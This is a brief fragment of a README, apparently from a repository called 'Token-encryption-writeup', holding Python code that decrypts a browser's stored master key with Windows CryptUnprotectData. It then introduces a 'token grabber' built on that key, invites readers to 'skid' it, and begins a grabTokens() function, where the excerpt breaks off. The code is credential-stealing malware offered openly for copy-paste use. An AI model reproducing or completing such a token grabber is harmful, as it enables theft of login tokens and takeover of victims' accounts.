NobodyWouldEverUseThis7/Token-encryption-writeup/README.md

     master_key = CryptUnprotectData(master_key, None, None, None, 0)[1] # and using win32crypt
     return master_key # boom, key

-# Below is a token grabber using it, feel free to skid it, honestly im just mad. make sure to mention "CC/CL" in your code if u copy-paste it :)

 def grabTokens():
     tokens = []